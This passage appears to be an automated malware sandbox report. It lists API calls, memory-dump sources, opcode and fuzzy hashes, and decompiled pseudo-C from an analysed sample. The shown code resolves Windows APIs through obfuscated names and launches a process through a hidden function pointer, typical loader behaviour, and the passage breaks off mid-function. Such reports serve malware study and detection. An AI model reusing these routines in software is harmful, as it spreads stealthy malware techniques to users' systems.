                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • moneypunct.LIBCPMT ref: 6E3055A2
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E3055B9
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E3055D9
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E3055E6
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                          • String ID: H=An
                                                                                                                          • API String ID: 3376033448-272624406
                                                                                                                          • Opcode ID: 49b858208bebf9cc40ec03e10010d73b544bee83bdea5513b6de6effd32370d6
                                                                                                                          • Instruction ID: 45908b957ccecad6234f632ae943c643a27ae4a2436b8a6ad285787d1aadb37f
                                                                                                                          • Opcode Fuzzy Hash: 49b858208bebf9cc40ec03e10010d73b544bee83bdea5513b6de6effd32370d6
                                                                                                                          • Instruction Fuzzy Hash: 740100B680051DEBCF21DBE4D955AFEB77BAF81328F200809D4116B280DF749A42C790
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E305275
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E30527F
                                                                                                                          • int.LIBCPMT ref: 6E305296
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • collate.LIBCPMT ref: 6E3052B9
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E3052D0
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E3052F0
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E3052FD
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercollate
                                                                                                                          • String ID: 8=An
                                                                                                                          • API String ID: 1767075461-2063616906
                                                                                                                          • Opcode ID: 19a1433f208d3bae1d9f62351a1e6e298944f2743b3e1caa6c6c23bc0e538bad
                                                                                                                          • Instruction ID: 81edfd91a2972bab58d5d88a860d09d40b4e034a937b5797d5773c46d7581bff
                                                                                                                          • Opcode Fuzzy Hash: 19a1433f208d3bae1d9f62351a1e6e298944f2743b3e1caa6c6c23bc0e538bad
                                                                                                                          • Instruction Fuzzy Hash: 9F01007A94051DEBCF01DBE4C855AEEB77AAF85328F200809D410AB290DF709D468790
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E30530A
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E305314
                                                                                                                          • int.LIBCPMT ref: 6E30532B
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • messages.LIBCPMT ref: 6E30534E
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E305365
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E305385
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E305392
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermessages
                                                                                                                          • String ID: <=An
                                                                                                                          • API String ID: 958335874-4100119773
                                                                                                                          • Opcode ID: 1e866aa85359bc70f1628647a40ec3733f2c512ed234b703ff01c281ae0d1cde
                                                                                                                          • Instruction ID: e7e3c4896437ff999e07e4bd1089f294472dd11e626bd02765b576e1da477752
                                                                                                                          • Opcode Fuzzy Hash: 1e866aa85359bc70f1628647a40ec3733f2c512ed234b703ff01c281ae0d1cde
                                                                                                                          • Instruction Fuzzy Hash: 2B01AD7A900519EFCF05DBE4C954BFEB77AAF85318F144909E4116B290DFB09E068B91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 27%
                                                                                                                          			E04CD5F64(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                                                                                          				intOrPtr _v8;
                                                                                                                          				intOrPtr _v12;
                                                                                                                          				long _v16;
                                                                                                                          				intOrPtr _v20;
                                                                                                                          				signed int _v24;
                                                                                                                          				void* __esi;
                                                                                                                          				long _t43;
                                                                                                                          				intOrPtr _t44;
                                                                                                                          				intOrPtr _t46;
                                                                                                                          				void* _t48;
                                                                                                                          				void* _t49;
                                                                                                                          				void* _t50;
                                                                                                                          				intOrPtr _t54;
                                                                                                                          				intOrPtr _t57;
                                                                                                                          				void* _t58;
                                                                                                                          				void* _t59;
                                                                                                                          				void* _t60;
                                                                                                                          				intOrPtr _t66;
                                                                                                                          				void* _t71;
                                                                                                                          				void* _t74;
                                                                                                                          				intOrPtr _t75;
                                                                                                                          				void* _t77;
                                                                                                                          				intOrPtr _t79;
                                                                                                                          				intOrPtr* _t80;
                                                                                                                          				intOrPtr _t91;
                                                                                                                          
                                                                                                                          				_t79 =  *0x4cdd37c; // 0x58b9818
                                                                                                                          				_v24 = 8;
                                                                                                                          				_t43 = GetTickCount();
                                                                                                                          				_push(5);
                                                                                                                          				_t74 = 0xa;
                                                                                                                          				_v16 = _t43;
                                                                                                                          				_t44 = E04CD3A69(_t74,  &_v16);
                                                                                                                          				_v8 = _t44;
                                                                                                                          				if(_t44 == 0) {
                                                                                                                          					_v8 = 0x4cdc1ac;
                                                                                                                          				}
                                                                                                                          				_t46 = E04CD51DA(_t79);
                                                                                                                          				_v12 = _t46;
                                                                                                                          				if(_t46 != 0) {
                                                                                                                          					_t80 = __imp__;
                                                                                                                          					_t48 =  *_t80(_v8, _t71);
                                                                                                                          					_t49 =  *_t80(_v12);
                                                                                                                          					_t50 =  *_t80(_a4);
                                                                                                                          					_t54 = E04CD75F6(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
                                                                                                                          					_v20 = _t54;
                                                                                                                          					if(_t54 != 0) {
                                                                                                                          						_t75 =  *0x4cdd2e0; // 0xbda5a8
                                                                                                                          						_t16 = _t75 + 0x4cdeb10; // 0x530025
                                                                                                                          						 *0x4cdd118(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
                                                                                                                          						_push(4);
                                                                                                                          						_t77 = 5;
                                                                                                                          						_t57 = E04CD3A69(_t77,  &_v16);
                                                                                                                          						_v8 = _t57;
                                                                                                                          						if(_t57 == 0) {
                                                                                                                          							_v8 = 0x4cdc1b0;
                                                                                                                          						}
                                                                                                                          						_t58 =  *_t80(_v8);
                                                                                                                          						_t59 =  *_t80(_v12);
                                                                                                                          						_t60 =  *_t80(_a4);
                                                                                                                          						_t91 = E04CD75F6(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
                                                                                                                          						if(_t91 == 0) {
                                                                                                                          							E04CD4AAB(_v20);
                                                                                                                          						} else {
                                                                                                                          							_t66 =  *0x4cdd2e0; // 0xbda5a8
                                                                                                                          							_t31 = _t66 + 0x4cdec30; // 0x73006d
                                                                                                                          							 *0x4cdd118(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
                                                                                                                          							 *_a16 = _v20;
                                                                                                                          							_v24 = _v24 & 0x00000000;
                                                                                                                          							 *_a20 = _t91;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					E04CD4AAB(_v12);
                                                                                                                          				}
                                                                                                                          				return _v24;
                                                                                                                          			}


                                                                                                                          APIs
                                                                                                                          • GetTickCount.KERNEL32 ref: 04CD5F79
                                                                                                                          • lstrlen.KERNEL32(?,80000002,00000005), ref: 04CD5FB9
                                                                                                                          • lstrlen.KERNEL32(00000000), ref: 04CD5FC2
                                                                                                                          • lstrlen.KERNEL32(00000000), ref: 04CD5FC9
                                                                                                                          • lstrlenW.KERNEL32(80000002), ref: 04CD5FD6
                                                                                                                          • lstrlen.KERNEL32(?,00000004), ref: 04CD6036
                                                                                                                          • lstrlen.KERNEL32(?), ref: 04CD603F
                                                                                                                          • lstrlen.KERNEL32(?), ref: 04CD6046
                                                                                                                          • lstrlenW.KERNEL32(?), ref: 04CD604D
                                                                                                                            • Part of subcall function 04CD4AAB: RtlFreeHeap.NTDLL(00000000,00000000,04CD5012,00000000,?,?,00000000), ref: 04CD4AB7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrlen$CountFreeHeapTick
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2535036572-0
                                                                                                                          • Opcode ID: 8d8e6c0adc746aa277857789a016268ab71675bdca9302be82ec82cf5a12bf27
                                                                                                                          • Instruction ID: 3192d223f4c58b3c6adedf4bf5c175982fe008aec82a799aab7fa039175ed6bc
                                                                                                                          • Opcode Fuzzy Hash: 8d8e6c0adc746aa277857789a016268ab71675bdca9302be82ec82cf5a12bf27
                                                                                                                          • Instruction Fuzzy Hash: 60415B76E00219FBDF11AFA4CC48A9EBBB6EF44358F054065EE04A7221D735EB11EB94
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 6E2FE172
                                                                                                                          • _Maklocstr.LIBCPMT ref: 6E2FE1DB
                                                                                                                          • _Maklocstr.LIBCPMT ref: 6E2FE1ED
                                                                                                                          • _Maklocchr.LIBCPMT ref: 6E2FE205
                                                                                                                          • _Maklocchr.LIBCPMT ref: 6E2FE215
                                                                                                                          • _Getvals.LIBCPMT ref: 6E2FE237
                                                                                                                            • Part of subcall function 6E2F688C: _Maklocchr.LIBCPMT ref: 6E2F68BB
                                                                                                                            • Part of subcall function 6E2F688C: _Maklocchr.LIBCPMT ref: 6E2F68D1
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: Maklocchr$Maklocstr$GetvalsH_prolog3_
                                                                                                                          • String ID: 4r6n
                                                                                                                          • API String ID: 3549167292-711905790
                                                                                                                          • Opcode ID: 837c16d7a7af90d9c3a1101e85f5b2cae4f9f0a9dd7780dd858b64ac7931bf62
                                                                                                                          • Instruction ID: 186556f33aad2e1b9461eacc802f8ff3e6df84476799c547b733a461a2a021f5
                                                                                                                          • Opcode Fuzzy Hash: 837c16d7a7af90d9c3a1101e85f5b2cae4f9f0a9dd7780dd858b64ac7931bf62
                                                                                                                          • Instruction Fuzzy Hash: 95215C75C40208EBDB159FE5D884ACEBBADEF04714F00885AF9149F245EB719A45CBA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E305434
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E30543E
                                                                                                                          • int.LIBCPMT ref: 6E305455
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E30548F
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E3054AF
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E3054BC
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                          • String ID: D=An
                                                                                                                          • API String ID: 55977855-1525241006
                                                                                                                          • Opcode ID: f2d02751d088fc5530bafc1d3ea4f945ad5b213ae80b85ac661a571c4a5a40c7
                                                                                                                          • Instruction ID: 74c2d2e1ae6932cbc1fc15dca3dddbf66958116285c5ba49b7b224f044fd71fb
                                                                                                                          • Opcode Fuzzy Hash: f2d02751d088fc5530bafc1d3ea4f945ad5b213ae80b85ac661a571c4a5a40c7
                                                                                                                          • Instruction Fuzzy Hash: E601C07A94051EEBCF11DBE4C995AFEB7BAAF41328F140809D4106B290DF709D46C791
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E3055F3
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E3055FD
                                                                                                                          • int.LIBCPMT ref: 6E305614
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E30564E
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E30566E
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E30567B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                          • String ID: P=An
                                                                                                                          • API String ID: 55977855-2240975974
                                                                                                                          • Opcode ID: 4194251eed908edce3729ca17fdc3717fb7a8eaf7982b6f81a787f74fa0bb1aa
                                                                                                                          • Instruction ID: 5e0571b6551071106f6e4f4a51418a34c469adc5e149f262c7ef23cce9da7aef
                                                                                                                          • Opcode Fuzzy Hash: 4194251eed908edce3729ca17fdc3717fb7a8eaf7982b6f81a787f74fa0bb1aa
                                                                                                                          • Instruction Fuzzy Hash: 8701C07A94091DDBCF01DBE4C954AEEB77AAF41328F150909D411AB2D0DF7099068791
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E30539F
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E3053A9
                                                                                                                          • int.LIBCPMT ref: 6E3053C0
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E3053FA
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E30541A
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E305427
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                          • String ID: @=An
                                                                                                                          • API String ID: 55977855-3582706681
                                                                                                                          • Opcode ID: cd005d659a9f3a35fcef470dbd04861d9aa8cff1b3b66f8788596929842ceee5
                                                                                                                          • Instruction ID: 574c7e52f45a66ecb9439c699394dd61d5a86dfd7a4c8c0fb7292664178eb835
                                                                                                                          • Opcode Fuzzy Hash: cd005d659a9f3a35fcef470dbd04861d9aa8cff1b3b66f8788596929842ceee5
                                                                                                                          • Instruction Fuzzy Hash: EB01C07A94051DDBCF11DBE8D854BFEB77AAF41328F240909D4106B280DF709D06CB91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F78FE
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F7908
                                                                                                                          • int.LIBCPMT ref: 6E2F791F
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F7959
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F7979
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F7986
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                          • String ID: |<An
                                                                                                                          • API String ID: 55977855-1857351383
                                                                                                                          • Opcode ID: b0488b939a8d0302058ba56c645e9625194c85893d3d967071d084f750b17d8b
                                                                                                                          • Instruction ID: 4fb8e2a2ca4667527e8595d37e783363e180a3729eb313918e177a42250b77ac
                                                                                                                          • Opcode Fuzzy Hash: b0488b939a8d0302058ba56c645e9625194c85893d3d967071d084f750b17d8b
                                                                                                                          • Instruction Fuzzy Hash: 1501AD7A94051EDBCF01DBE4C954AEEF7BBBF86318F140809D4116B280DF7099078781
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 6E32F299: GetLastError.KERNEL32(00000000,00000000,?,6E327CF9,?,?,00000003,?,6E2F1083,6E2F10F4,?,6E2F0EE0,00000000,00000000,00000000,00000004), ref: 6E32F29E
                                                                                                                            • Part of subcall function 6E32F299: SetLastError.KERNEL32(00000000,6E37A1A0,000000FF,?,6E327CF9,?,?,00000003,?,6E2F1083,6E2F10F4,?,6E2F0EE0,00000000,00000000,00000000), ref: 6E32F33C
                                                                                                                          • _free.LIBCMT ref: 6E3332BF
                                                                                                                          • _free.LIBCMT ref: 6E3332D8
                                                                                                                          • _free.LIBCMT ref: 6E333316
                                                                                                                          • _free.LIBCMT ref: 6E33331F
                                                                                                                          • _free.LIBCMT ref: 6E33332B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: _free$ErrorLast
                                                                                                                          • String ID: C
                                                                                                                          • API String ID: 3291180501-1037565863
                                                                                                                          • Opcode ID: 63bcb8ae4a4a2a6f8c24174eff1d4983104a5c3fbafbc700b1acfb031487d10c
                                                                                                                          • Instruction ID: 99ea515e45e12f0c79514554d751a49cbdb8ece6492dd1da196cae82a00036dc
                                                                                                                          • Opcode Fuzzy Hash: 63bcb8ae4a4a2a6f8c24174eff1d4983104a5c3fbafbc700b1acfb031487d10c
                                                                                                                          • Instruction Fuzzy Hash: 4DC16B7590126A9FDB24DF68C898E9DB3B4FF08314F6085EAE859A7354D731AE90CF40
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 73%
                                                                                                                          			E04CD1000(void* __eax, void* __ecx) {
                                                                                                                          				long _v8;
                                                                                                                          				char _v12;
                                                                                                                          				void* _v16;
                                                                                                                          				void* _v28;
                                                                                                                          				long _v32;
                                                                                                                          				void _v104;
                                                                                                                          				char _v108;
                                                                                                                          				long _t36;
                                                                                                                          				intOrPtr _t40;
                                                                                                                          				intOrPtr _t47;
                                                                                                                          				intOrPtr _t50;
                                                                                                                          				void* _t58;
                                                                                                                          				void* _t68;
                                                                                                                          				intOrPtr* _t70;
                                                                                                                          				intOrPtr* _t71;
                                                                                                                          
                                                                                                                          				_t1 = __eax + 0x14; // 0x74183966
                                                                                                                          				_t69 =  *_t1;
                                                                                                                          				_t36 = E04CD4837(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
                                                                                                                          				_v8 = _t36;
                                                                                                                          				if(_t36 != 0) {
                                                                                                                          					L12:
                                                                                                                          					return _v8;
                                                                                                                          				}
                                                                                                                          				E04CDA938( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
                                                                                                                          				_t40 = _v12(_v12);
                                                                                                                          				_v8 = _t40;
                                                                                                                          				if(_t40 == 0 && ( *0x4cdd298 & 0x00000001) != 0) {
                                                                                                                          					_v32 = 0;
                                                                                                                          					asm("stosd");
                                                                                                                          					asm("stosd");
                                                                                                                          					asm("stosd");
                                                                                                                          					_v108 = 0;
                                                                                                                          					memset( &_v104, 0, 0x40);
                                                                                                                          					_t47 =  *0x4cdd2e0; // 0xbda5a8
                                                                                                                          					_t18 = _t47 + 0x4cde3b3; // 0x73797325
                                                                                                                          					_t68 = E04CD2291(_t18);
                                                                                                                          					if(_t68 == 0) {
                                                                                                                          						_v8 = 8;
                                                                                                                          					} else {
                                                                                                                          						_t50 =  *0x4cdd2e0; // 0xbda5a8
                                                                                                                          						_t19 = _t50 + 0x4cde760; // 0x58b8d08
                                                                                                                          						_t20 = _t50 + 0x4cde0af; // 0x4e52454b
                                                                                                                          						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
                                                                                                                          						if(_t71 == 0) {
                                                                                                                          							_v8 = 0x7f;
                                                                                                                          						} else {
                                                                                                                          							_v108 = 0x44;
                                                                                                                          							E04CD34C7();
                                                                                                                          							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
                                                                                                                          							_push(1);
                                                                                                                          							E04CD34C7();
                                                                                                                          							if(_t58 == 0) {
                                                                                                                          								_v8 = GetLastError();
                                                                                                                          							} else {
                                                                                                                          								CloseHandle(_v28);
                                                                                                                          								CloseHandle(_v32);
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						HeapFree( *0x4cdd270, 0, _t68);
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				_t70 = _v16;
                                                                                                                          				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
                                                                                                                          				E04CD4AAB(_t70);
                                                                                                                          				goto L12;
                                                                                                                          			}



















                                                                                                                          APIs
                                                                                                                            • Part of subcall function 04CD4837: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04CD101C,?,00000001,?,?,00000000,00000000), ref: 04CD485C
                                                                                                                            • Part of subcall function 04CD4837: GetProcAddress.KERNEL32(00000000,7243775A), ref: 04CD487E
                                                                                                                            • Part of subcall function 04CD4837: GetProcAddress.KERNEL32(00000000,614D775A), ref: 04CD4894
                                                                                                                            • Part of subcall function 04CD4837: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04CD48AA
                                                                                                                            • Part of subcall function 04CD4837: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04CD48C0
                                                                                                                            • Part of subcall function 04CD4837: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04CD48D6
                                                                                                                          • memset.NTDLL ref: 04CD106A
                                                                                                                            • Part of subcall function 04CD2291: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,04CD1083,73797325), ref: 04CD22A2
                                                                                                                            • Part of subcall function 04CD2291: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 04CD22BC
                                                                                                                          • GetModuleHandleA.KERNEL32(4E52454B,058B8D08,73797325), ref: 04CD10A0
                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 04CD10A7
                                                                                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04CD110F
                                                                                                                            • Part of subcall function 04CD34C7: GetProcAddress.KERNEL32(36776F57,04CD5B13), ref: 04CD34E2
                                                                                                                          • CloseHandle.KERNEL32(00000000,00000001), ref: 04CD10EC
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 04CD10F1
                                                                                                                          • GetLastError.KERNEL32(00000001), ref: 04CD10F5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3075724336-0
                                                                                                                          • Opcode ID: 03ecdab4b1ba1918b7f9506b15b7c052398d7f03d7dcbe9821eeeed2a5b8afbf
                                                                                                                          • Instruction ID: 464540c73896cd5417b2a77c860937771594dc94fe3dcdae53e1d2b7c21ee656
                                                                                                                          • Opcode Fuzzy Hash: 03ecdab4b1ba1918b7f9506b15b7c052398d7f03d7dcbe9821eeeed2a5b8afbf
                                                                                                                          • Instruction Fuzzy Hash: 3F316FBAD00209BFDB11AFE4CC88EAEBBB9EB08344F044565E706A7151D734BE44DB50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: MaklocchrMaklocstr$H_prolog3_
                                                                                                                          • String ID: 4r6n
                                                                                                                          • API String ID: 2404127365-711905790
                                                                                                                          • Opcode ID: 367dd94f14d977b8e8492b93298f8d1ffa5873ac77cf3629bdb10f370008621a
                                                                                                                          • Instruction ID: 2b2b6961f23717f662e003459fa3f88958a3836592db1f3c2a46ff638e0874b8
                                                                                                                          • Opcode Fuzzy Hash: 367dd94f14d977b8e8492b93298f8d1ffa5873ac77cf3629bdb10f370008621a
                                                                                                                          • Instruction Fuzzy Hash: FD2136B5C40348EBDB14DFE5D884ADEBBB8EF44704F00885AE9159F255EB70DA41CBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 63%
                                                                                                                          			E04CD1974(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                          				intOrPtr _v8;
                                                                                                                          				intOrPtr _t9;
                                                                                                                          				intOrPtr _t13;
                                                                                                                          				char* _t28;
                                                                                                                          				void* _t33;
                                                                                                                          				void* _t34;
                                                                                                                          				char* _t36;
                                                                                                                          				intOrPtr* _t40;
                                                                                                                          				char* _t41;
                                                                                                                          				char* _t42;
                                                                                                                          				char* _t43;
                                                                                                                          
                                                                                                                          				_t34 = __edx;
                                                                                                                          				_push(__ecx);
                                                                                                                          				_t9 =  *0x4cdd2e0; // 0xbda5a8
                                                                                                                          				_t1 = _t9 + 0x4cde62c; // 0x253d7325
                                                                                                                          				_t36 = 0;
                                                                                                                          				_t28 = E04CD43A8(__ecx, _t1);
                                                                                                                          				if(_t28 != 0) {
                                                                                                                          					_t40 = __imp__;
                                                                                                                          					_t13 =  *_t40(_t28);
                                                                                                                          					_v8 = _t13;
                                                                                                                          					_t41 = E04CD75F6(_v8 +  *_t40(_a4) + 1);
                                                                                                                          					if(_t41 != 0) {
                                                                                                                          						strcpy(_t41, _t28);
                                                                                                                          						_pop(_t33);
                                                                                                                          						__imp__(_t41, _a4);
                                                                                                                          						_t36 = E04CD5601(_t34, _t41, _a8);
                                                                                                                          						E04CD4AAB(_t41);
                                                                                                                          						_t42 = E04CD756E(StrTrimA(_t36, "="), _t36);
                                                                                                                          						if(_t42 != 0) {
                                                                                                                          							E04CD4AAB(_t36);
                                                                                                                          							_t36 = _t42;
                                                                                                                          						}
